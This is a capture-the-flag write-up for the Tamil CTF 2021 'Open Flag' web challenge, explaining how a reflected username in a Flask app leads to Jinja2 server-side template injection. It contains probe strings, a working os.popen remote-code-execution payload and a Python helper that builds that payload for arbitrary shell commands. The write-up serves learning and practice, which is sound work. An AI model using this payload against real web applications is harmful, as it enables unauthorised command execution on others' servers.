
Tamil CTF 2021 - Open Flag

Description:

What is the open flag challenge? I will tell you the location of the flag; you just need to access it.

Finding the vulnerability:

The given website consists of two pages: a registration panel and a static page.

registration page

static page

We notice that the username entered at registration is reflected on the static page. After injecting a few payloads we see that the input is neither sanitized nor escaped.

poc1

Reflection on its own is only an XSS candidate, so the next step is to test for Server Side Template Injection. The application turns out to use the Jinja2 templating engine. A simple arithmetic payload confirms the vulnerability: if the page shows 49 instead of the literal text {{7*7}}, the expression was evaluated on the server rather than just echoed back. A second probe, {{7*'7'}}, tells the engine apart: Jinja2 (Python string repetition) renders 7777777, whereas Twig would render 49.

{{7*7}}

poc2

Solution:

Using the payload below we can turn the SSTI into code execution. Flask exposes its configuration object to every template as config; the class of that object lives in a Flask module that imports os, so walking config.__class__.__init__.__globals__['os'] reaches the os module without any import statement in the template. os.popen() runs the shell command and .read() returns its output into the rendered page.

{{config.__class__.__init__.__globals__['os'].popen('base64 flag.jpg').read()}}

The flag is an image, so it is base64-encoded with the command itself; raw JPEG bytes would be mangled in the HTML response. The static page now contains the encoded image. Save the base64 run from the response (only the encoded text, without the surrounding HTML, or use base64 -di on GNU coreutils to ignore non-base64 characters) to a text file and decode it with:

base64 -d flag.txt > flag.jpg
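The probing and decoding steps above, as an added offline helper that is not part of the original writeup or of the challenge: classify_probe() interprets what the static page rendered for the two template probes, build_rce_payload() reproduces the writeup's payload for an arbitrary shell command, and extract_image() pulls the base64-encoded JPEG out of the HTML and decodes it. The sample response is constructed (a minimal JPEG-looking byte string embedded in made-up HTML), and the request side (target URL, form field name) is deliberately left out so the script runs without the challenge being up.

```python
#!/usr/bin/env python3
"""Offline helper for the SSTI workflow in this writeup.

Added example, not the writeup's own code. The sample HTML response and
the image bytes below are constructed; no request to the target is made.
"""
import base64
import re

# Classic template probes: arithmetic, then string multiplication.
PROBE_ARITH = "{{7*7}}"
PROBE_STRMUL = "{{7*'7'}}"


def classify_probe(arith_out: str, strmul_out: str) -> str:
    """Interpret what the page rendered for the two probes.

    literal {{7*7}} echoed back -> input is reflected but not evaluated
    49 and 7777777              -> Python-based engine (Jinja2 style)
    49 and 49                   -> Twig-style engine (string coerced to int)
    """
    if PROBE_ARITH in arith_out:
        return "reflected-only"
    if "49" not in arith_out:
        return "unknown"
    if "7777777" in strmul_out:
        return "jinja2-like"
    if "49" in strmul_out:
        return "twig-like"
    return "unknown"


def build_rce_payload(cmd: str) -> str:
    """Build the writeup's payload: reach `os` via the globals of the
    module defining Flask's `config` object and run a shell command."""
    # A single quote would close the popen('...') argument early.
    if "'" in cmd:
        raise ValueError("command must not contain single quotes")
    return ("{{config.__class__.__init__.__globals__['os'].popen('"
            + cmd + "').read()}}")


def extract_image(html: str) -> bytes:
    """Pull the base64 JPEG printed by `base64 flag.jpg` out of the page.

    A JPEG starts with FF D8 FF, which base64 encodes as "/9j/", so that
    prefix anchors the search; `base64` wraps lines, hence the \\s in the
    character class.
    """
    m = re.search(r"/9j/[A-Za-z0-9+/=\s]+", html)
    if not m:
        raise ValueError("no base64 JPEG found in response")
    blob = re.sub(r"\s+", "", m.group(0))
    data = base64.b64decode(blob, validate=True)
    if data[:3] != b"\xff\xd8\xff":
        raise ValueError("decoded data is not a JPEG")
    return data


# Constructed sample: SOI marker, a JFIF APP0 fragment and EOI marker,
# embedded in the static page the way `base64 flag.jpg` would print it.
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"
                b"\x00\x01\x00\x01\x00\x00\xff\xd9")
SAMPLE_RESPONSE = ("<html><body><h1>Welcome, "
                   + base64.encodebytes(SAMPLE_IMAGE).decode()
                   + "!</h1></body></html>")


if __name__ == "__main__":
    # The two probe responses here are the ones the writeup observed
    # (49 for {{7*7}}), with the Jinja2 answer assumed for {{7*'7'}}.
    print("engine:", classify_probe("<h1>Welcome, 49!</h1>",
                                    "<h1>Welcome, 7777777!</h1>"))
    print("payload:", build_rce_payload("base64 flag.jpg"))
    with open("flag.jpg", "wb") as fh:
        fh.write(extract_image(SAMPLE_RESPONSE))
    print("wrote flag.jpg")
```

In the real run the payload string is what goes into the username field and SAMPLE_RESPONSE is replaced by the body of the static page; extract_image() then does what "save to a text file and base64 -d" does, without the surrounding HTML tripping up the decoder.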

The flag is written in the decoded image.

flag

Happy hacking :)

Original writeup (https://github.com/apostolides/ctf-writeups/tree/master/TamilCTF_2021/Open_Flag).